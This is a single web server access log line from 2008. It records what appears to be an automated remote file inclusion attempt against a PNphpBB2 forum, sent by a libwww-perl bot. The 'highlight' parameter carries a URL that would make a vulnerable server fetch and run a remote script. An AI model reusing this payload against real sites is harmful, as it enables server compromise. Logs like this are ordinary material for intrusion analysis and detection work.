216.246.77.172 - - [29/Jul/2008:09:19:38 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.810" "www.dmulk.com"
